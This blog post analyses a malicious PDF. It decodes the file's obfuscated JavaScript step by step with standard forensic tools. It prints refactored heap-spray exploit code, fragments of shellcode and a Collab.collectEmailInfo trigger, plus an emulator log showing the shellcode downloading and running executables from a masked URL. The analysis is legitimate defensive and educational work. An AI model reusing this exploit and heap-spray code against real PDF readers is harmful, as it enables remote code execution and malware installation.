Wednesday, January 8, 2014

Analysis of suspicious PDF


Hello. Happy New Year and Merry Christmas! After a long break I decided to write a new article about analysis suspicious PDF file. Several months ago I had an interesting quest with analysis some suspicious pdf file and I have a free time to tell how it was.
Almost everything tools mentioned in this article you can discover in Remnux image. You can download and install it as Virtual appliance on Vmware or VirtualBox.
First of all I analysed the file with pdfid tool:
PDF Header: %PDF-1.3
obj 11
endobj 11
stream 4
endstream 4
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 1
/JavaScript 1
/AA 0
/OpenAction 1
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0

Immediately draw attention on the discovered OpenAction and Javascript. Good.
Next I used pdf-parser for parse the file.

obj 1 0
Type: /Catalog
Referencing: 2 0 R, 4 0 R

<<
/Type /Catalog
/PageLayout /SinglePage
/Pages 2 0 R
/OpenAction 4 0 R
>>

See that OpenAction calls Javascript in 4 object, which linked on Flatedecode object 5:
obj 4 0
Type: /Action
Referencing: 5 0 R
<<
/Type /Action
/S /JavaScript
/JS 5 0 R
>>
obj 5 0
Type:
Referencing:
Contains stream

<<
/Length 394
/Filter /FlateDecode
>>

Decode javascript code with pdf-parser:


Transform into a convenient form:
var sum = ''; var duct = 300; var os = ""; var pr = null; var num = 1; var func = 'd'; app.doc.syncAnnotScan(); if (app.plugIns.length < 1) { func += "4"; num = 0; } if (!(app.plugIns.length < 0)) { var xnm = { nPage: 0 }; pr = app.doc.getAnnots(xnm); sum = pr[num].subject; } if (app.plugIns.length > 2) { var buf = sum.split(/-/); var ap = this; var acc = ap [ "une" + "sca" + "pe" ]; var src = String ["fromC"+"harC"+"ode" ]; for (var n = 0; n < buf.length-1; n++) os += acc( src(37) + buf[n+1] ); func = ""; if (app.plugIns.length > 0) { if (!(app.plugIns.length > 0)) { func += "abd"; num = 123; } num = 0; ap ['ev' + func + src(77+20) + "l" ](os); num = 0; } }

Not bad. Also let's analyze the pdf file with jsunpack :


At the first sight jsunpack immediately detected function getAnnots which referred with vulnerability CVE-2009-1492, about annotation in pdf file in Adobe Reader and Acrobat. But if you check our results above with the appropriate exploit , this vulnerability has no relation to the present case. In this case an annotaion used as store of the big part of script for obfuscation.

The annotaion data received by function getAnnots stored in encoded stream-object 9. Copy our result's js code and include data from the stream. Obviously, the first step is to replace eval with alert and open file with your browser. But lets try to run it with Spidermonkey js. The main variables are already defined in pre.js file which you can find in Remnux distro also.

Not bad. Obtained a new script after decoded, which uses eval function and takes data from the stream 7:

function LnX6eI__qBoDrb5(Xj__TJe_0_j, Sut0_yx_4){
var O_6__t8 = 20;
var LK__SC__k = 0;
var Yf2_7661XQk3t = 512;
var M__D2__r_5_I7_D = O_6__t8;
var k12_hf_0p2_30aB = "";
var m57_Ww_VVKg = 4;
var P_A7_cf7J = this ;
var uvD2__e0__4W = "1234ee";
var Ja4_hF_A41Ch510 = arguments;
try {
var YNS0B64n__I_E = 0;
if (app){
M__D2__r_5_I7_D = M__D2__r_5_I7_D + 2;
Sut0_yx_4 = pr[YNS0B64n__I_E].subject;
}
uvD2__e0__4W = uvD2__e0__4W.replace(/\d+/, "call");
}
catch (e){
}
….

LnX6eI__qBoDrb5(0, "b02h8a6b5h47a7a0353ha0agbe863926927d6i399fc16014550ebd6516171b6e243d5c5gcd4073a1795jaf7f5348a8aa58953eab208d36cfb6c765479dcab32g4e221f3727140i4hc9667ha1bh8ca1ba9g6003cc439f082042074e10150g7j3h8e.....
….
");

After refactoring :

function func_01(arg_0, arg_1) {
var v0 = 20;
var v1 = 0;
var v2 = 512;
var v3 = v0;
var v4 = "";
var v5 = 4;
var v6 = this;
var v7 = "1234ee";
var v8 = arguments;
try {
var v9 = 0;
if (app) {
v3 = v3 + 2;
arg_1 = pr[v9].subject;
}
v7 = v7.replace(/\d+/, "call");
} catch (e) {}
v3 = v3 - v0;
var v10 = new Array();
var v11 = 150;
if (v11 > 0) {
v10[0] = v11;
v10[1] = v2;
v10[0] = v10[0] - v11;
v10[2] = v10[0];
v10[1] = v10[1] - v2;
v10[3] = v10[1];
}
if (arg_0) {
v10 = arg_0;
}
if (!arg_0) {
var v12 = v8[v7].toString(); //arguments.callee.toString();
var v13 = 0;
var v14 = v13;
v11 = v11 - 102; //150 – 102 = 48
var v15 = 0;
while (v14 < v12.length) { //while(0<arguments.callee.toString().length);
v15 = v12.charCodeAt(v14); // arguments.callee.toString().charCodeAt(0);
if (v15 >= v11 && v15 <= 57) {
if (v13 == v5) {
v13 = -1;
}
if (v13 < 0) {
v13 = 0;
}
v10[v13] += v15;
if (v10[v13] > v2) {
v10[v13] -= v2;
}
v13 = v13 + 1;
}
v14 = v14 + 1;
}
}
var v16 = 0;
var v17 = 0;
var v18 = -1;
var v19 = 0;
var v20 = 0;
do {
var v21 = 256;
if (v10[v19] > v21) {
v10[v19] -= v21;
}
v19 = v19 + 1;
} while (v19 < v5);
v19 = v19 - v5;
while (v19 < arg_1.length) {
var v22 = arg_1.substr(v19, 1) + ' V V ';
v19 = v19 + 1;
var v23 = parseInt(v22, v0);
if (v18 != -1) {
v17 += v23;
if (v16 == v5) {
v16 = 0;
}
var v24 = v17;
v24 = v24 - (v20 + 2) * v10[v16];
if (v24 <= 0) {
v24 = v24 - Math.floor(v24 / 256) * 256;
}
v24 = String.fromCharCode(v24);
if (v3 == 1) {
v4 += v23;
} else if (v3 == 2) {
v4 += v24;
} else {
v4 += v19;
v18 = -2;
}
v18 = -1;
v16 = v16 + 1;
v20 = v20 + 1;
} else if (v18 == -1) {
v18 = v0;
v17 = v23 * v0;
}
}
var v25 = this;
v25['eval'](v4);
}
func_01(0, "b02h8a......
….
The most interesting thing in the code hidden in var v12 - function arguments.callee. Arguments.callee specifies the function body of the currently executing function. So this code actually uses itself to do the permutation. if you change something in the code (like I did when refactored the code or replaced the eval call with alert) you will break the whole deobfuscation part. The good articles about this function you can read : http://isc.sans.org/diary/Browser+*does*+matter%2C+not+only+for+vulnerabilities+-+a+story+on+JavaScript+deobfuscation/1519 , https://isc.sans.edu/diary/Static+analysis+of+malicous+PDFs+%28Part+%232%29/7906 and http://www.nobunkum.ru/ru/flash (Russian).

In this way we can replace arguments.callee.toString().length to length of the whole function in characters and going further with arguments.callee.toString().charCodeAt(0) returns the first character in a string of our function.
Not needed to decode everything – it could be done with spidermokey or you can use jsunpack

The final script looks like:

var C__IC5 = new Array();
var c__fqx1kX_j7_o = 0;
var f520T_5lgB_18Rk = "";
function ki1K8ydoVI_X_f(E81L1G8LUs4H, a5_G7_Y){
var M5Klbt_L = a5_G7_Y.toString();
var UY__3N = "";
….
if (app.viewerVersion == 9.103 && xr_1d__1g_Y < 9.13){
xr_1d__1g_Y = 9.13;
}
if (!(xr_1d__1g_Y < 9 || xr_1d__1g_Y >= 9.2) || !(xr_1d__1g_Y < 8 || xr_1d__1g_Y >= 8.17)
|| !(xr_1d__1g_Y < 7 || xr_1d__1g_Y >= 7.14)){
Y8tju_86jgt_g7d(xr_1d__1g_Y);
}

After refactoring:

var gvar_0 = new Array();
var gvar_1 = 0;
var gvar_2 = "";
function func_01(arg_0, arg_1) {
var v0 = arg_1.toString();
var v1 = "";
for (var v2 = 0; v2 < v0.length; v2++) {
var v3 = parseInt(v0.substr(v2, 1));
if (!isNaN(v3)) {
v3 = v3.toString(16);
if (v3.length == 1) {
v3 = "0" + v3;
} else if (v3.length != 2) {
v3 = "00";
}
v1 = v3 + v1;
}
}
while (v1.length < 8) {
v1 = "0" + v1;
}
var v4 = arg_0.toString(16);
if (v4.length == 1) {
v4 = "0" + v4;
} else if (v4.length != 2) {
v4 = "00";
}
v1 = "3" + v4 + "P" + v1;
return v1;
}
function func_02(arg_0, arg_1) {
var v0 = new Array("");
var v1 = arg_0;
var x3l3Y5Us4__3;
if ((x3l3Y5Us4__3 = arg_0.lastIndexOf("%u00")) != -1) {
if (x3l3Y5Us4__3 + 6 == arg_0.length) {
v0[0] = arg_0.substr(x3l3Y5Us4__3 + 4, 2);
v1 = arg_0.substring(0, x3l3Y5Us4__3);
}
}
x3l3Y5Us4__3 = 1;
for (fr___rItg7HCnRr = 0; fr___rItg7HCnRr < arg_1.length; fr___rItg7HCnRr++) {
var v2 = arg_1.charCodeAt(fr___rItg7HCnRr).toString(16);
if (v2.length == 1) {
v2 = "0" + v2;
}
v0[x3l3Y5Us4__3] = v2;
x3l3Y5Us4__3++;
}
fr___rItg7HCnRr = v0[0].length ? 0 : 1;v0[x3l3Y5Us4__3] = "00";v0[x3l3Y5Us4__3 + 1] = "00";x3l3Y5Us4__3 += 2;
if ((v0.length - fr___rItg7HCnRr) % 2) {
v0[x3l3Y5Us4__3] = "00";
}
while (fr___rItg7HCnRr < v0.length) {
v1 += "%u" + v0[fr___rItg7HCnRr + 1] + v0[fr___rItg7HCnRr];
fr___rItg7HCnRr += 2;
}
v1 += "%u0000";
return v1;
}
function func_03(arg_0, arg_1) {
while (arg_0.length * 2 < arg_1) {
arg_0 += arg_0;
}
arg_0 = arg_0.substring(0, arg_1 / 2);
return arg_0;
}
function func_04(arg_0, arg_1, gvar_3) {
var v0 = 0x0c0c0c0c;
var v1 = unescape(arg_1);
var v2 = func_01(arg_0, arg_2);
var v3 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51.....
….
var v4 = "%u9050%u9050%u9050%u9050%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%.....
…..
app.b5t8_3a = unescape(func_02(v4, v2));
var v5 = 0x400000;
var v6 = v3.length * 2;
var v7 = v5 - (v6 + 0x38);
v1 = func_03(v1, v7);
var v8 = (v0 - 0x400000) / v5;
for (var v9 = 0; v9 < v8; v9++) {
gvar_0[v9] = v1 + v3;
}
}
function func_05() {
var v0 = "";
for (fr___rItg7HCnRr = 0; fr___rItg7HCnRr < 12; fr___rItg7HCnRr++) {
v0 += unescape("%u0c0c%u0c0c");
}
var v1 = "";
for (fr___rItg7HCnRr = 0; fr___rItg7HCnRr < 750; fr___rItg7HCnRr++) {
v1 += v0;
}
this.collabStore = Collab.collectEmailInfo({
subj: "",
msg: v1
});
app.clearTimeOut(gvar_1);
}
function func_06(arg_0) {
var v0 = gvar_1;
if ((arg_0 >= 8 && arg_0 < 8.11) || arg_0 < 7.1) {
func_04(23, "%u0c0c%u0c0c", arg_0);
app.d_AUYb_6j8_5r = func_05;
gvar_1 = app.setTimeOut("app.d_AUYb_6j8_5r()", 1);
}
func_04(13, "%u0c0c%u0c0c", arg_0);
if (v0) {
app.clearTimeOut(v0);
}
}
var gvar_3 = 0;
var gvar_4 = app.plugIns;
for (var gvar_5 = 0; gvar_5 < gvar_4.length; gvar_5++) {
var gvar_6 = gvar_4[gvar_5].version;
if (gvar_6 > gvar_3) {
gvar_3 = gvar_6;
}
}
if (app.viewerVersion == 9.103 && gvar_3 < 9.13) {
gvar_3 = 9.13;
}
if (!(gvar_3 < 9 || gvar_3 >= 9.2) || !(gvar_3 < 8 || gvar_3 >= 8.17) || !(gvar_3 < 7 || gvar_3 >= 7.14)) {
func_06(gvar_3);

After short analysis discovered :
  1. Confirm jsunpack's suggestion about function Collab.collectEmailInfo and heap spray:
v0 += unescape("%u0c0c%u0c0c"); // hex 0x0c0c0c0c is a popular data in heap spray exploits.
this.collabStore = Collab.collectEmailInfo({
subj: "",
msg: unescape("%u0c0c%u0c0c")
});
  1. In the function func_04 used var v0 with value 0x0c0c0c0c which is the popular part of heap spraying exploits ; Traditionally, heap spraying has relied upon spraying with 0x0C0C0C0C followed by shellcode which serves as both an address in the heap and a series of nops.
    In variables v3, v4 discovered some code looks like shellcode because there contains some encoded bytes in arguments with NOP instructions at the beginning .
To confirm my suggestions I used libemu from PDFStreamDumper with shellcode from v4, but libemu also presented in Remnux distro:


I discovered url http://xxxxxx.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f01010 which is used for upload and execute some exe file:

Extracted URL: http://xxxxxxxx.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f01010
0x91 push_urlmon (signature)


Unpack Log:
--------------------------------------------------
Loaded 4b8 bytes from file .\tmp.sc
Detected %u encoding input format converting...
Byte Swapping %u encoded input buffer..
Memory monitor enabled..
Initilization Complete..
Dump mode Active...
Max Steps: 2000000
Using base offset: 0x401000

401055 LoadLibraryA(urlmon)
401084 GetTempPathA(len=104, buf=12fce0) = 22
4010bc URLDownloadToFileA(http://xxxx.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f010100, C:\Users\Admin\AppData\Local\Temp\lthm.exe)
4010c7 WinExec(C:\Users\Admin\AppData\Local\Temp\lthm.exe)
4010bc URLDownloadToFileA(http://xxxxc.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f010101, C:\Users\Admin\AppData\Local\Temp\egWl.exe)
4010c7 WinExec(C:\Users\Admin\AppData\Local\Temp\egWl.exe)
4010bc URLDownloadToFileA(http://xxxxx.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f010102, C:\Users\Admin\AppData\Local\Temp\CqTM.exe)
4010c7 WinExec(C:\Users\Admin\AppData\Local\Temp\CqTM.exe)
4010d5 ExitProcess(1432107587)

Stepcount 300624
Primary memory: Reading 0x192 bytes from 0x401000
Scanning for changes...
Change found at 287 dumping to .\tmp.unpack
Data dumped successfully to disk

Memory Monitor Log:
*PEB (fs30) accessed at 0x40101f
peb.InInitializationOrderModuleList accessed at 0x40102a


  1. The terms included in scripts :
if (!(gvar_3 < 9 || gvar_3 >= 9.2) || !(gvar_3 < 8 || gvar_3 >= 8.17) || !(gvar_3 < 7 || gvar_3 >= 7.14)) {
func_06(gvar_3);
looks like discribed in http://cvedetails.com/cve/2009-2990 : Array index error in Adobe Reader and Acrobat 9.x before 9.2, 8.x before 8.1.7, and possibly 7.x through 7.1.4 might allow attackers to execute arbitrary code via unspecified vectors.

In FlateDecode stream object 11 of our file we discovered come code in U3D:

/Subtype /U3D
/Length 27384
/Filter /FlateDecode
>>

'U3D\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00$\x00\x00\x00\x80\xb6\x02\x00\x00\x00\x00\x00j\x00\x00\x00\x15\xff\xff\xff\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\xff\xff\xff\x88\x00\x00\x00\x00\x00\x00\x00\t\x00VcgMesh01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"\xff\xff\xffb\x00\x00\x00\x00\x00\x00\x00\t\x00VcgMesh01

Well. We have URL, Shellcode, some CVE and that's enough for the article. Next time I want to write a new article about malware analysis with Cuckoo box, jsunpack and web-proxy like Burp Suite or OWASP ZAP.

No comments:

Post a Comment